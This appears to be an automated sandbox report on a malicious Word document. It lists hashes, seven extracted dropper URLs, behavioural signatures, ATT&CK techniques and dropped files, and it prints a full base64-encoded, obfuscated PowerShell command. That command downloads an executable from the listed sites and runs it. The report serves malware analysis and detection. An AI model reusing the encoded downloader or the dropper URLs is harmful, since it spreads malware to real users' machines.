a99c9ad593ce0d637ad4526f58ca7493d46ff5142d908d55ef9ee711deefb69b

General

Target

2a2442881b7130fdbb2fa25fa2cdc0fb_JaffaCakes118.doc
Size

191KB
MD5

2a2442881b7130fdbb2fa25fa2cdc0fb
SHA1

e1c3e7dda75f30d0f1116be4b8f34a465855b3c2
SHA256

a99c9ad593ce0d637ad4526f58ca7493d46ff5142d908d55ef9ee711deefb69b
SHA512

ea038c49f0d5a71a601a41203d5424b3a642c7f3c95aaf0670d950f67465174770db55cca39f4ee89657a00108a86d9bbf8127ce950546ce5272f2be04056bf3
SSDEEP

3072:i9ufstRUUKSns8T00JSHUgteMJ8qMD7gjj0zKNf9cfmfE7qdmVJKk/Juvc5a8a8L:i9ufsfgIf0pL8KbS

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://reklamdasiniz.com/wp-admin/W/

exe.dropper

http://www.paramedicaleducationguidelines.com/wp-admin/7S/

exe.dropper

http://bimasoftcbt.maannajahjakarta.com/wp-admin/i3K/

exe.dropper

http://casualhome.com/wp-admin/Y/

exe.dropper

https://aemine.vn/wp-admin/KMq/

exe.dropper

http://aahnaturals.net/wp-includes/A3/

exe.dropper

https://sbsec.org/bsadmin-portal/1nf/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3796	4796	POwersheLL.exe	82

Blocklisted process makes network request 4 IoCs

flow	pid	Process
12	3796	POwersheLL.exe
13	3796	POwersheLL.exe
16	3796	POwersheLL.exe
20	3796	POwersheLL.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
2848	WINWORD.EXE
2848	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3796	POwersheLL.exe
3796	POwersheLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3796	POwersheLL.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
2848	WINWORD.EXE
2848	WINWORD.EXE
2848	WINWORD.EXE
2848	WINWORD.EXE
2848	WINWORD.EXE
2848	WINWORD.EXE
2848	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2a2442881b7130fdbb2fa25fa2cdc0fb_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2848

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -ENCOD JABWAHQAbQBmADQAegB5AD0AKAAoACcATABsACcAKwAnADcAJwApACsAKAAnAGwAJwArACcAMQBpACcAKQArACcAeQAnACkAOwAmACgAJwBuAGUAdwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABlAE4AVgA6AHUAcwBFAHIAUABSAE8ARgBpAEwARQBcAEsAdgBvADkAOQAwAFcAXAB5AGgAVwAwAFMAOABlAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQBSAGUAYwB0AG8AcgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwB1AGAAUgBJAGAAVAB5AFAAYABSAG8AVABvAGAAYwBvAEwAIgAgAD0AIAAoACcAdABsACcAKwAoACcAcwAxACcAKwAnADIALAAgACcAKQArACcAdAAnACsAKAAnAGwAcwAxACcAKwAnADEALAAnACsAJwAgAHQAbABzACcAKQApADsAJABBADAAOABwAHMAcABfACAAPQAgACgAKAAnAE4AJwArACcANABrACcAKQArACgAJwBxACcAKwAnAHUAcAAnACkAKQA7ACQAVwB3AGUAcwBnAHUAcwA9ACgAJwBEACcAKwAoACcANgByACcAKwAnAHYAJwApACsAKAAnADAAJwArACcAYwA1ACcAKQApADsAJABWAGgAYwBxAG8AZwBxAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAE8AJwArACgAJwBxAEkAJwArACcASwB2AG8AOQAnACkAKwAoACcAOQAwAHcATwBxAEkAJwArACcAWQBoACcAKQArACcAdwAnACsAJwAwACcAKwAnAHMAJwArACgAJwA4ACcAKwAnAGUATwBxAEkAJwApACkAIAAgAC0AUgBlAFAAbABhAEMARQAoACcATwAnACsAJwBxAEkAJwApACwAWwBDAEgAQQByAF0AOQAyACkAKwAkAEEAMAA4AHAAcwBwAF8AKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAFMAOAA1AHMAeABkAGsAPQAoACcAUwAnACsAKAAnAHUAdAAnACsAJwBwAHoAeAB6ACcAKQApADsAJABKAGgANQBnAG4ANwBmAD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABuAEUAdAAuAHcARQBiAGMAbABpAEUAbgBUADsAJABUADgAeQA4AGsAeAB5AD0AKAAoACcAaAB0AHQAJwArACcAcAA6AC8AJwArACcALwByAGUAawAnACsAJwBsAGEAbQAnACsAJwBkACcAKQArACgAJwBhAHMAJwArACcAaQBuAGkAegAnACsAJwAuAGMAbwBtAC8AJwApACsAKAAnAHcAcAAnACsAJwAtACcAKQArACcAYQAnACsAJwBkAG0AJwArACgAJwBpACcAKwAnAG4ALwBXAC8AKgAnACkAKwAoACcAaAB0AHQAJwArACcAcAAnACkAKwAoACcAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwB3AC4AcAAnACsAJwBhACcAKQArACgAJwByAGEAbQBlAGQAJwArACcAaQBjAGEAbAAnACkAKwAnAGUAJwArACgAJwBkAHUAYwAnACsAJwBhACcAKQArACgAJwB0ACcAKwAnAGkAbwBuAGcAdQAnACsAJwBpAGQAZQBsAGkAbgAnACkAKwAoACcAZQAnACsAJwBzAC4AJwApACsAKAAnAGMAbwBtAC8AdwBwACcAKwAnAC0AYQBkACcAKwAnAG0AJwApACsAKAAnAGkAbgAnACsAJwAvADcAUwAvACoAJwArACcAaAAnACkAKwAoACcAdAB0AHAAJwArACcAOgAvAC8AJwArACcAYgBpAG0AYQAnACsAJwBzACcAKQArACcAbwAnACsAKAAnAGYAdABjAGIAJwArACcAdAAuAG0AYQAnACsAJwBhAG4AJwApACsAKAAnAG4AJwArACcAYQBqACcAKQArACgAJwBhACcAKwAnAGgAagBhACcAKwAnAGsAYQAnACkAKwAnAHIAdAAnACsAJwBhACcAKwAnAC4AJwArACgAJwBjAG8AbQAvACcAKwAnAHcAcAAnACkAKwAoACcALQAnACsAJwBhAGQAbQBpACcAKwAnAG4AJwApACsAKAAnAC8AaQAnACsAJwAzAEsALwAqACcAKwAnAGgAdAB0AHAAJwArACcAOgAvAC8AJwApACsAKAAnAGMAYQBzAHUAYQBsACcAKwAnAGgAbwBtAGUALgBjACcAKwAnAG8AJwApACsAKAAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQAnACkAKwAoACcAaQAnACsAJwBuAC8AWQAvACcAKwAnACoAaAB0ACcAKwAnAHQAcABzADoALwAvAGEAJwArACcAZQBtACcAKQArACgAJwBpACcAKwAnAG4AZQAnACkAKwAoACcALgB2ACcAKwAnAG4AJwApACsAJwAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAJwBhACcAKwAoACcAZAAnACsAJwBtAGkAJwApACsAJwBuACcAKwAnAC8AJwArACgAJwBLAE0AcQAvACcAKwAnACoAJwArACcAaAB0AHQAcAA6ACcAKQArACgAJwAvAC8AYQBhACcAKwAnAGgAJwApACsAKAAnAG4AYQAnACsAJwB0ACcAKQArACgAJwB1ACcAKwAnAHIAJwArACcAYQBsACcAKwAnAHMALgBuAGUAdAAvAHcAcAAnACkAKwAnAC0AaQAnACsAKAAnAG4AYwBsAHUAZAAnACsAJwBlACcAKwAnAHMALwBBADMALwAqAGgAdAB0AHAAJwArACcAcwAnACkAKwAoACcAOgAvAC8AcwAnACsAJwBiACcAKQArACcAcwAnACsAJwBlAGMAJwArACgAJwAuACcAKwAnAG8AcgAnACkAKwAoACcAZwAnACsAJwAvAGIAJwApACsAKAAnAHMAJwArACcAYQBkAG0AaQAnACkAKwAoACcAbgAtACcAKwAnAHAAJwApACsAKAAnAG8AJwArACcAcgB0ACcAKQArACgAJwBhAGwAJwArACcALwAxACcAKQArACgAJwBuACcAKwAnAGYALwAnACkAKQAuACIAUwBgAFAATABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABLAGcAcQB1AHoAZwBzAD0AKAAoACcAWQBwADMAJwArACcAcgBpACcAKQArACcAeQAnACsAJwB6ACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAE0AcwByAHkAYQAwAG4AIABpAG4AIAAkAFQAOAB5ADgAawB4AHkAKQB7AHQAcgB5AHsAJABKAGgANQBnAG4ANwBmAC4AIgBkAGAAbwBXAE4AbABPAGAAQQBEAGYAYABJAGwAZQAiACgAJABNAHMAcgB5AGEAMABuACwAIAAkAFYAaABjAHEAbwBnAHEAKQA7ACQAUwAwAHYAdAAyADkAMgA9ACgAJwBJADYAJwArACgAJwA0AHgAJwArACcAYQAnACkAKwAnAGMAZwAnACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQAVgBoAGMAcQBvAGcAcQApAC4AIgBsAEUATgBgAGcAYABUAGgAIgAgAC0AZwBlACAAMgA5ADgANAAyACkAIAB7AC4AKAAnAEkAbgB2ACcAKwAnAG8AawBlAC0AJwArACcASQB0AGUAbQAnACkAKAAkAFYAaABjAHEAbwBnAHEAKQA7ACQAUABmADQAeABrAGcAdAA9ACgAJwBVACcAKwAnAHUAJwArACgAJwBoAG0ANAAnACsAJwBhAGIAJwApACkAOwBiAHIAZQBhAGsAOwAkAE4AMQAyAGMAZgBmAHMAPQAoACgAJwBRAGkAJwArACcANQBuADcAJwApACsAJwBhACcAKwAnADcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABHAGwAdwBzADcAbgBwAD0AKAAoACcAQQBlACcAKwAnADkAJwApACsAKAAnAG4AdQByACcAKwAnAHQAJwApACkA
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3796

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCD915F.tmp\sist02.xsl

Filesize
245KB

MD5
f883b260a8d67082ea895c14bf56dd56

SHA1
7954565c1f243d46ad3b1e2f1baf3281451fc14b

SHA256
ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

SHA512
d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p4rkrfvf.xwd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Kvo990W\yhW0S8e\N4kqup.exe

Filesize
120KB

MD5
c4df0d36b3734f5f4c56f799ab065d5c

SHA1
2bd2bfc254dbc5ed1e75fc637081197e5c42d41d

SHA256
4cc6111e6a65a83ebb5db0c9497ee02d3acdb49a38fa2fac9a16199c12a574fd

SHA512
1401bb1992d5ccc50d42e42fad5babbbcee99f92760bc270b7b2fb197a3e6d4ea87b1a97ce04c8ca6eb6f07fc5898d9184b9edaef3d312fd91ec34627216fd03

Download Submit
memory/2848-24-0x00007FFEE2350000-0x00007FFEE2545000-memory.dmp

Filesize
2.0MB

Download
memory/2848-54-0x00007FFEE2350000-0x00007FFEE2545000-memory.dmp

Filesize
2.0MB

Download
memory/2848-3-0x00007FFEE23ED000-0x00007FFEE23EE000-memory.dmp

Filesize
4KB

Download
memory/2848-6-0x00007FFEA23D0000-0x00007FFEA23E0000-memory.dmp

Filesize
64KB

Download
memory/2848-7-0x00007FFEE2350000-0x00007FFEE2545000-memory.dmp

Filesize
2.0MB

Download
memory/2848-8-0x00007FFEE2350000-0x00007FFEE2545000-memory.dmp

Filesize
2.0MB

Download
memory/2848-9-0x00007FFEE2350000-0x00007FFEE2545000-memory.dmp

Filesize
2.0MB

Download
memory/2848-10-0x00007FFEE2350000-0x00007FFEE2545000-memory.dmp

Filesize
2.0MB

Download
memory/2848-11-0x00007FFEA0370000-0x00007FFEA0380000-memory.dmp

Filesize
64KB

Download
memory/2848-12-0x00007FFEE2350000-0x00007FFEE2545000-memory.dmp

Filesize
2.0MB

Download
memory/2848-13-0x00007FFEA0370000-0x00007FFEA0380000-memory.dmp

Filesize
64KB

Download
memory/2848-2-0x00007FFEA23D0000-0x00007FFEA23E0000-memory.dmp

Filesize
64KB

Download
memory/2848-25-0x00007FFEE2350000-0x00007FFEE2545000-memory.dmp

Filesize
2.0MB

Download
memory/2848-4-0x00007FFEA23D0000-0x00007FFEA23E0000-memory.dmp

Filesize
64KB

Download
memory/2848-587-0x00007FFEE2350000-0x00007FFEE2545000-memory.dmp

Filesize
2.0MB

Download
memory/2848-5-0x00007FFEE2350000-0x00007FFEE2545000-memory.dmp

Filesize
2.0MB

Download
memory/2848-0-0x00007FFEA23D0000-0x00007FFEA23E0000-memory.dmp

Filesize
64KB

Download
memory/2848-1-0x00007FFEA23D0000-0x00007FFEA23E0000-memory.dmp

Filesize
64KB

Download
memory/2848-526-0x00007FFEE2350000-0x00007FFEE2545000-memory.dmp

Filesize
2.0MB

Download
memory/2848-562-0x00007FFEE2350000-0x00007FFEE2545000-memory.dmp

Filesize
2.0MB

Download
memory/2848-563-0x00007FFEE2350000-0x00007FFEE2545000-memory.dmp

Filesize
2.0MB

Download
memory/2848-564-0x00007FFEE2350000-0x00007FFEE2545000-memory.dmp

Filesize
2.0MB

Download
memory/2848-584-0x00007FFEA23D0000-0x00007FFEA23E0000-memory.dmp

Filesize
64KB

Download
memory/2848-585-0x00007FFEA23D0000-0x00007FFEA23E0000-memory.dmp

Filesize
64KB

Download
memory/2848-583-0x00007FFEA23D0000-0x00007FFEA23E0000-memory.dmp

Filesize
64KB

Download
memory/2848-586-0x00007FFEA23D0000-0x00007FFEA23E0000-memory.dmp

Filesize
64KB

Download
memory/3796-59-0x000001A8EE7C0000-0x000001A8EE7E2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads